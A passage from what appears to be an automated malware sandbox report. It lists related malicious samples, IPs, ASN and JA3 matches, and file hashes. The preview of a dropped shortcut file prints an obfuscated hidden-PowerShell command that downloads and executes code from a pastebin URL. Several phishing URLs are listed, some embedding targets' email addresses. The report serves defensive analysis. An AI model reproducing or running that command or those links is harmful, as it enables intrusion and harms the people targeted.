                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • 185.199.109.133
                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 185.199.108.133
                                                                                  na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                  • 185.199.109.133
                                                                                  na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                  • 185.199.108.133
                                                                                  oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                                  • 185.199.108.133
                                                                                  oWARzPF1Ms.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                  • 185.199.108.133
                                                                                  New PO-RFQ13101.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                  • 185.199.110.133
                                                                                  discord.comBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 162.159.137.232
                                                                                  gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.137.232
                                                                                  cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.135.232
                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • 162.159.138.232
                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.138.232
                                                                                  Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                  • 162.159.135.232
                                                                                  Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                  • 162.159.136.232
                                                                                  0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                  • 162.159.137.232
                                                                                  0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                  • 162.159.136.232
                                                                                  cPl7CoJTBx.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                                                  • 162.159.128.233
                                                                                  pastebin.comBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 104.20.3.235
                                                                                  gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 104.20.4.235
                                                                                  cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 104.20.4.235
                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.19.24
                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 172.67.19.24
                                                                                  xc.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                  • 172.67.19.24
                                                                                  w0QdNGUNtd.exeGet hashmaliciousRedLineBrowse
                                                                                  • 104.20.3.235
                                                                                  DHL_Shipping_Invoices_Awb_0000000.vbsGet hashmaliciousRemcosBrowse
                                                                                  • 104.20.3.235
                                                                                  SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exeGet hashmaliciousXmrigBrowse
                                                                                  • 104.20.4.235
                                                                                  SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                  • 104.20.4.235

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  HQservCommunicationSolutionsILSecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                  • 45.144.31.105
                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                  • 45.144.31.105
                                                                                  QTmGYKK6SL.exeGet hashmaliciousUnknownBrowse
                                                                                  • 91.194.11.174
                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                  • 91.194.11.174
                                                                                  mctsc.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                  • 45.144.30.144
                                                                                  Form_W-9_Ver-083_030913350-67084228u8857-460102.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                  • 91.194.11.64
                                                                                  MSI.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                  • 91.194.11.183
                                                                                  upfilles.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                  • 91.194.11.183
                                                                                  QII19aQAik.elfGet hashmaliciousUnknownBrowse
                                                                                  • 91.194.11.55
                                                                                  SecuriteInfo.com.Win32.DropperX-gen.26130.25747.exeGet hashmaliciousPureLog StealerBrowse
                                                                                  • 45.144.29.148
                                                                                  CLOUDFLARENETUSBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.111.161
                                                                                  gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.137.232
                                                                                  cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.135.232
                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • 162.159.138.232
                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.138.232
                                                                                  HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.27.206.92
                                                                                  https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.134.42
                                                                                  https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.90.114
                                                                                  ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                  • 188.114.96.3
                                                                                  CLOUDFLARENETUSBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.111.161
                                                                                  gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.137.232
                                                                                  cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.135.232
                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • 162.159.138.232
                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.138.232
                                                                                  HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.27.206.92
                                                                                  https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.134.42
                                                                                  https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.90.114
                                                                                  ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                  • 188.114.96.3
                                                                                  CLOUDFLARENETUSBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.111.161
                                                                                  gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.137.232
                                                                                  cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.135.232
                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • 162.159.138.232
                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.138.232
                                                                                  HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.27.206.92
                                                                                  https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                  • 162.159.134.42
                                                                                  https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.90.114
                                                                                  ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                  • 188.114.96.3

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133
                                                                                  gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133
                                                                                  cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133
                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133
                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133
                                                                                  https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133
                                                                                  na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133
                                                                                  na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133
                                                                                  LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133
                                                                                  https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.20.3.235
                                                                                  • 172.67.19.24
                                                                                  • 162.159.138.232
                                                                                  • 185.199.111.133

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                                  Category:dropped
                                                                                  Size (bytes):1728
                                                                                  Entropy (8bit):4.527272298423835
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                                  MD5:724AA21828AD912CB466E3B0A79F478B
                                                                                  SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                                  SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                                  SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                                  Malicious:true
                                                                                  Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):11608
                                                                                  Entropy (8bit):4.890472898059848
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:39smG3YrKkDQp5SVsm5emln9smKp5FiMDOmEN3H+OHgFKxoeRH83YrKk7Vsm5emK:cEU/iQ0HzAFGLCib4Sib47VoGIpN6KQc
                                                                                  MD5:66B287A82D897FD706FD1C8A5098E8A5
                                                                                  SHA1:9C5962E1ECA4CFC2D5BC8BA4C6C737F77EC524F8
                                                                                  SHA-256:5009DAAF58FD83E555547764CC1AE0F55B664B4A41AEF5EECB1963C7F6A0C413
                                                                                  SHA-512:5A5713E9F6F1A32E7120838EA5CC4651D1ADA684685D11B6DDEF1CCBD4ED759DAD9D857C36FB2F9B4B6637BCC27ABC3C89BE9428C4CB117817D3F6468DD1DEBB
                                                                                  Malicious:false
                                                                                  Preview:PSMODULECACHE......x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllulm/Z:NllU
                                                                                  MD5:022CA1CFCB1ED572D58EA006B628DA3D
                                                                                  SHA1:657EA7E8B4E0AAC4EA74181FEE54BC7E2230F5F8
                                                                                  SHA-256:67A07D890507E7F7BFD525D2B40C6946B9F74DF80EBBCB09681CF91310B3321F
                                                                                  SHA-512:C5C88D30B1AFCC645367828F889CB0AF847F525D6FDD5ACA397F2C1FA0CDD7E07361171BA01B54785BCFFA86A3AF1D85B9EEDD19ACF4FFFEFDEE5FC17A84B702
                                                                                  Malicious:false
                                                                                  Preview:@...e...............................R..".............@..........

                                                                                  C:\Users\user\AppData\Local\Temp\RES2A1.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 15 15:20:29 2024, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):3.9488850344654884
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:H+e9ERrwZsadNGkwZH3wKTFjmNWI+ycuZhNHakS5PNnqSqd:GwZ1zdwZgKTRm41ulHa37qSK
                                                                                  MD5:7F3F4AF92939C7E967A864F770E0B526
                                                                                  SHA1:AF97EABAF4E50340588DB12A51559F4262382A75
                                                                                  SHA-256:721B1F5222857906EE4F4FB659F2F0DB3CEB6452F40B0700F8CEE76011623B4F
                                                                                  SHA-512:A745ABB07B231C84147C66953E3F28A2303CD3EE6BB9730CEA3D3E33A695217A50A82786BB805334DD41DB8E7369FDE7DE82C511EFC1F184C8059280BAAD3EE4
                                                                                  Malicious:false
                                                                                  Preview:L...=..g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP.................n.'.Ch.....nfC............2.......C:\Users\user\AppData\Local\Temp\RES2A1.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.4.d.v.a.f.a.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                  C:\Users\user\AppData\Local\Temp\RES5818.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 15 15:19:45 2024, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):3.998004806050697
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HCe9EujwZY9nsWVEwZHFwKTFjmNII+ycuZhNdakS7PNnqSqd:fjwZ0nsWVEwZGKTRmu1ulda3xqSK
                                                                                  MD5:C319C5E61ECC76B9EF0D7A58EC422016
                                                                                  SHA1:4A75851B9058283AD9710ABA655DC9882FB5FD81
                                                                                  SHA-256:A21D2EF54D7BE58417DF2CC0CE065DAFADC122726E206394E6BB7C77A8B2A5F7
                                                                                  SHA-512:66A8441F580D9A19711B199645A629FD8A630D7FE5BCCFBF71446D8098278E2D560A3468E065A5C148C3BAFB05D547ADB2630F1DC939DAB954078255CEB0B179
                                                                                  Malicious:false
                                                                                  Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP.....................(W.H'E...q..........3.......C:\Users\user\AppData\Local\Temp\RES5818.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.h.v.m.f.b.z.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mctoj1s.gjr.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_faxyk0sf.kva.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_geq1rn3w.xcx.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2nn52il.aub.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hrdmyn4b.oee.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibyws24i.it3.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orcz4cgz.b4k.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osgwnh5l.eej.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvvpzowh.4lo.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
